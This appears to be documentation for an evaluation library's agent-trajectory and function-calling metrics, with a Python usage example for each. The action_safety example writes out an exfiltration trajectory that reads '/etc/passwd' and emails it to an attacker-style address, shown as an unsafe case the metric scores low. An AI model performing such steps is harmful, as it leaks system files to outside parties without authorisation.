Agents & Function Calling
11 metrics for evaluating agent trajectories, tool use, reasoning quality, and function call correctness. All run locally via evaluate().
- 7 agent trajectory metrics (continuous 0.0-1.0): task completion, step efficiency, tool selection, trajectory quality, goal progress, action safety, reasoning quality
- 4 function calling metrics (binary 0/1): name match, parameter validation, accuracy, exact match
task_completion, action_safety, and reasoning_quality support augment=True.
These metrics evaluate how well an agent performed a task and whether it called the right functions with the right parameters.
from fi.evals import evaluate
result = evaluate(
    "task_completion",
    output="Booked flight AA123 from SFO to JFK on March 15. Confirmation sent to user.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
print(result.score) # 0.95
Agent Trajectory Metrics
Pass the full agent trajectory (tool calls, intermediate steps, final output) as output, and the task description as context. All return a continuous score from 0.0 to 1.0.
| Metric | What it measures |
|---|---|
| task_completion | Whether the agent completed the assigned task |
| step_efficiency | Whether the agent reached its goal in minimal steps |
| tool_selection_accuracy | Whether the agent selected the correct tools |
| trajectory_score | Overall trajectory quality covering tool use, ordering, and progress |
| goal_progress | How much progress was made toward the goal |
| action_safety | Whether the agent’s actions are safe and authorized |
| reasoning_quality | Quality of the agent’s reasoning chain |
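To build intuition for how a continuous 0.0-1.0 trajectory metric can be computed locally, here is a toy sketch of a step-efficiency-style score as the ratio of minimal to actual steps. This is purely illustrative and is not the library's actual heuristic; `step_efficiency_sketch` is a hypothetical helper.

```python
# Illustrative sketch only -- NOT the library's actual heuristic.
# A continuous 0.0-1.0 efficiency score as the ratio of the minimal
# number of steps needed to the number of steps the agent took.

def step_efficiency_sketch(actual_steps: int, minimal_steps: int) -> float:
    """Return 1.0 when the agent took no detours, lower otherwise."""
    if actual_steps <= 0:
        return 0.0
    return min(1.0, minimal_steps / actual_steps)

# Agent needed 2 steps but took 4 -> half-efficient.
print(step_efficiency_sketch(actual_steps=4, minimal_steps=2))  # 0.5
```

The real metrics weigh far more than step counts (tool choice, ordering, safety), but the same shape applies: a bounded score where 1.0 is ideal and partial credit is possible.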
task_completion
Whether the agent completed the assigned task. Supports augment=True.
result = evaluate(
    "task_completion",
    output="Created Jira ticket PROJ-452 'Fix login timeout' assigned to @alice.",
    context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.97
step_efficiency
Whether the agent reached its goal in minimal steps without unnecessary detours.
result = evaluate(
    "step_efficiency",
    output="Step 1: search_users('alice') → found. Step 2: create_ticket(title='Fix login timeout', assignee='alice') → PROJ-452.",
    context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.92
tool_selection_accuracy
Whether the agent selected the correct tools for the task.
result = evaluate(
    "tool_selection_accuracy",
    output="Called: [search_flights, book_flight, send_confirmation]",
    context="User asked to book a flight and send a confirmation email.",
    expected_output="[search_flights, book_flight, send_confirmation]",
)
# score → 1.0
trajectory_score
Overall trajectory quality covering tool use, ordering, and task progress.
result = evaluate(
    "trajectory_score",
    output="Step 1: search_db('revenue Q4') → $2.3M. Step 2: generate_chart(data) → chart.png. Step 3: send_email(to='cfo', attachment='chart.png').",
    context="User asked: pull Q4 revenue, chart it, and email the chart to the CFO.",
)
# score → 0.94
goal_progress
How much progress was made, even if the task wasn’t fully completed. Useful for partial-credit scoring.
result = evaluate(
    "goal_progress",
    output="Step 1: search_flights('SFO','JFK','2025-03-15') → 3 results. Step 2: agent timed out.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
# score → 0.45
action_safety
Whether the agent’s actions are safe — no destructive operations, data leaks, or unauthorized access. Supports augment=True.
result = evaluate(
    "action_safety",
    output="Step 1: read_file('/etc/passwd'). Step 2: send_email(to='external@attacker.com', body=contents).",
    context="User asked to check system health.",
)
# score → 0.05
reasoning_quality
Quality of the agent’s reasoning chain — logical, well-structured, leads to the correct conclusion. Supports augment=True.
result = evaluate(
    "reasoning_quality",
    output="Thought: User needs Q4 revenue. I should query the database first. Action: query_db('SELECT SUM(revenue) FROM sales WHERE quarter=Q4') → $2.3M.",
    context="User asked: what was our Q4 revenue?",
)
# score → 0.88
Function Calling Metrics
Validate whether the agent called the right function with the right parameters. All are binary (0 or 1). Pass actual and expected function calls as JSON strings.
| Metric | What it checks |
|---|---|
| function_name_match | Whether the function name matches (ignores parameters) |
| parameter_validation | Whether function parameters match (names and values) |
| function_call_accuracy | Overall correctness — function name and parameters together |
| function_call_exact_match | Strict exact match — JSON must be identical |
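To see how the four binary checks relate to one another, here is a minimal pure-Python sketch of name, parameter, and exact-match comparisons over JSON-encoded calls. This is an illustration of the idea, not the library's implementation; the helper names are hypothetical, and the real exact-match check may be stricter (e.g. comparing raw strings).

```python
import json

# Illustrative sketch only -- NOT the fi.evals implementation.
# Each check returns 1 (pass) or 0 (fail), mirroring the binary metrics.

def name_match(actual: str, expected: str) -> int:
    return int(json.loads(actual)["name"] == json.loads(expected)["name"])

def params_match(actual: str, expected: str) -> int:
    return int(json.loads(actual)["arguments"] == json.loads(expected)["arguments"])

def exact_match(actual: str, expected: str) -> int:
    # Parsing before comparing makes key order and whitespace irrelevant;
    # a stricter variant could compare the raw JSON strings instead.
    return int(json.loads(actual) == json.loads(expected))

a = '{"name": "get_weather", "arguments": {"city": "NYC"}}'
b = '{"name": "get_weather", "arguments": {"city": "San Francisco"}}'
print(name_match(a, b))    # 1 -- same function name
print(params_match(a, b))  # 0 -- city differs
print(exact_match(a, b))   # 0 -- any difference fails exact match
```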
function_name_match
Whether the function name matches. Ignores parameters.
result = evaluate(
    "function_name_match",
    output='{"name": "get_weather", "arguments": {"city": "NYC"}}',
    expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco"}}',
)
# score → 1.0 (name matches, params ignored)
parameter_validation
Whether function parameters match (names and values).
result = evaluate(
    "parameter_validation",
    output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
    expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
)
# score → 1.0
function_call_accuracy
Overall correctness — function name and parameters together.
result = evaluate(
    "function_call_accuracy",
    output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
    expected_output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
)
# score → 1.0
function_call_exact_match
Strict exact match — JSON must be identical.
result = evaluate(
    "function_call_exact_match",
    output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
    expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 1.0
result = evaluate(
    "function_call_exact_match",
    output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 3}}',
    expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 0.0 (top_k differs)
Augmented Evaluation
task_completion, action_safety, and reasoning_quality support augment=True. This runs the local heuristic first, then refines with an LLM.
from fi.evals import evaluate
result = evaluate(
    "task_completion",
    output="Booked flight AA123. Confirmation #BK-9921 sent to user@email.com.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15 and email the confirmation.",
    model="gemini/gemini-2.5-flash",
    augment=True,
)
print(result.metadata["engine"]) # "local+llm"
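Conceptually, augment=True is a two-stage pipeline: score with the local heuristic first, then let an LLM refine that score. The control flow can be sketched as below. This is a toy illustration with a stand-in heuristic and a stubbed model call, not the fi.evals internals; every name in it is hypothetical.

```python
# Illustrative control-flow sketch only -- NOT fi.evals internals.
# Stage 1: a cheap local heuristic. Stage 2: an LLM refinement pass.

def local_heuristic(output: str, context: str) -> float:
    # Toy heuristic: keyword overlap between the task and the result.
    task_words = set(context.lower().split())
    done_words = set(output.lower().split())
    return len(task_words & done_words) / max(len(task_words), 1)

def evaluate_augmented(output, context, call_llm):
    base = call_llm.__self__ if False else local_heuristic(output, context)
    refined = call_llm(output, context, base)  # LLM adjusts the base score
    return {"score": refined, "engine": "local+llm"}

# Stub LLM that nudges the heuristic score upward, capped at 1.0.
stub_llm = lambda out, ctx, base: round(min(1.0, base + 0.1), 2)
result = evaluate_augmented(
    "Booked flight. Confirmation sent.",
    "book a flight and send confirmation",
    stub_llm,
)
print(result["engine"])  # local+llm
```

The appeal of this shape is cost control: the heuristic runs on every example, while the LLM pass can be reserved for the metrics (and rows) where nuance actually matters.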